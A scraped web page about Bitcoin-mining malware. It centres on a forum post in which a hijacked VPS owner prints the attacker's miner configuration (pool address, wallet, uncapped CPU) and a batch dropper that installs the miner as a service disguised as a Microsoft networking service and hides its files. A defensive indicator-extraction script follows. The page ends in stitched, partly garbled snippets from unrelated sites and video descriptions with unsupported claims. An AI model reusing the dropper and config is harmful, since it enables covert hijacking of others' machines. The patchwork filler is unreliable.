How to remove a Trojan.BitCoinMiner Miner Infection

MoneroOcean pool owner supports botnets

Hi guys,
As of late my VPS that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
On further investigation I found that this miner uses config.json as its configuration file and I'm posting the contents also publicly here:
    {
        "algo": "cryptonight",
        "api": {
            "port": 0,
            "access-token": null,
            "id": null,
            "worker-id": null,
            "ipv6": false,
            "restricted": true
        },
        "asm": true,
        "autosave": true,
        "av": 0,
        "background": false,
        "colors": true,
        "cpu-affinity": null,
        "cpu-priority": null,
        "donate-level": 0,
        "huge-pages": true,
        "hw-aes": null,
        "log-file": null,
        "max-cpu-usage": 100,
        "pools": [
            {
                "url": "gulf.moneroocean.stream:80",
                "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": false,
                "variant": -1,
                "enabled": true,
                "tls": false,
                "tls-fingerprint": null
            }
        ],
        "print-time": 60,
        "retries": 5,
        "retry-pause": 5,
        "safe": false,
        "threads": [
            { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
            { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
            { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }
        ],
        "user-agent": null,
        "watch": true
    }
cmd.bat contents are the following:
    attrib -a -s -r -h C:\WINDOWS\Debug\nat*
    net stop Networks
    taskkill /f /im system.exe
    C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
    sc config "Networks20181019" DisplayName= "Networksr20181019"
    sc description "Networks20181019" "Microsoft Windows Networks"
    Set ProcessName=system.exe
    sc start "Networks20181019"
    attrib +a +s +r +h C:\WINDOWS\Debug\nat*
    echo u/off
    del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. In short, he doesn't want to ban the miner.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IPs publicly.
What more can I do? The pool owner also threatened to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address as well.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero
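
A triage sketch for the two artefacts quoted in the post, added here as an example and not code from the poster or the pool: it pulls the service name, wrapper and target binary, hidden paths and pool endpoint out of the script and config so they can be searched for on other hosts. The function names, flag labels and the `<WALLET>` placeholder are assumptions; the sample strings are constructed from the post's text.

```python
import json
import re

# Constructed sample: the cmd.bat lines from the post that the checks use.
CMD_BAT = r'''attrib -a -s -r -h C:\WINDOWS\Debug\nat*
net stop Networks
taskkill /f /im system.exe
C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
sc config "Networks20181019" DisplayName= "Networksr20181019"
sc description "Networks20181019" "Microsoft Windows Networks"
sc start "Networks20181019"
attrib +a +s +r +h C:\WINDOWS\Debug\nat*
del %USERPROFILE%\Desktop\0.exe'''

# Constructed sample: only the config.json keys the checks read; wallet replaced.
CONFIG = '''{"donate-level": 0, "max-cpu-usage": 100, "background": false,
 "pools": [{"url": "gulf.moneroocean.stream:80", "user": "<WALLET>", "tls": false}]}'''

def triage_batch(text):
    """Pull persistence and hiding indicators out of a dropper batch script."""
    out = {"services": {}, "hidden_paths": [], "killed": [], "deleted": []}
    for line in text.splitlines():
        line = line.strip()
        if m := re.match(r'(\S+\.exe)\s+install\s+"([^"]+)"\s+(\S+)', line, re.I):
            out["services"][m[2]] = {"wrapper": m[1], "binary": m[3]}
        elif m := re.match(r'sc\s+config\s+"([^"]+)"\s+DisplayName=\s*"([^"]+)"', line, re.I):
            out["services"].setdefault(m[1], {})["display_name"] = m[2]
        elif m := re.match(r'attrib\s+((?:\+\w\s+)+)(\S+)', line, re.I):
            if {"+h", "+s"} <= set(m[1].lower().split()):  # hidden + system
                out["hidden_paths"].append(m[2])
        elif m := re.match(r'taskkill\s+.*?/im\s+(\S+)', line, re.I):
            out["killed"].append(m[1])
        elif m := re.match(r'del\s+(\S+)', line, re.I):
            out["deleted"].append(m[1])
    return out

def triage_config(text):
    """Flag miner settings worth hunting for in proxy, DNS and firewall logs."""
    cfg, flags = json.loads(text), []
    for pool in cfg.get("pools", []):
        host, _, port = pool["url"].rpartition(":")
        flags.append(("pool", host, int(port)))
        if not pool.get("tls") and int(port) in (80, 443):
            flags.append(("mining-on-web-port", host, int(port)))
    if cfg.get("max-cpu-usage") == 100:
        flags.append(("cpu-uncapped", None, 100))
    return flags
```

The service name and the `C:\WINDOWS\Debug\nat` path give host-side search terms, while the pool host and port give the network-side ones.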


The virus's malicious activity consists of running multiple malicious scripts on the infected PC through a backdoor that the Bitcoin Miner Virus sets up beforehand. The purpose of these scripts is to connect the virus to a command-and-control server. If the mining virus uses different classes to run more scripts that allow various actions to be carried out:

Riskware.Miner

Symptoms of a Trojan.BitCoinMiner Infection

As Trojan.BitCoinMiner infections do not display a window and run silently in the background, many people do not even know that they are infected.

Crypto-miner malware infects your PC or other devices like an ordinary virus, but then starts using your device to compute a digital currency. To ... Bitcoins, for example ...

The CoinMiner virus abuses your computer's processing power so that the owner of the virus earns money from computationally expensive calculations. This practical tip explains exactly how the principle of BitCoin mining works. Download the free program Malwarebytes Anti-Malware from CHIP and install it. This is an extremely reliable ...

What is Bitcoin Miner Virus? As ransomware attacks become more frequent than ever, driving the Bitcoin price up, the need for a Bitcoin miner virus also increases. Malware actors try to implement a Bitcoin mining virus in everything they do, whether it is backdoors, viruses, ransomware, adware or redirects.


Unedited: BitCoin mining Virus/Malware found, explained.

BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of this...

Hello! I noticed my computer slowing down, caused by a virus that was mining Bitcoins on my computer. In this video you can follow how I solved the problem. Production and editing: Me ...

There's a horrible bitcoin mining virus spreading through Russia. This Russian Bitcoin Virus is stealing credit card info. Putin Adviser on bitcoin ransomware: “In regions with lower bandwidth ...

This video is simply some unedited footage that I was preparing to show how malware that masquerades as a Realtek Audio Driver sits and uses system resources to mine Bitcoin for the malware author.
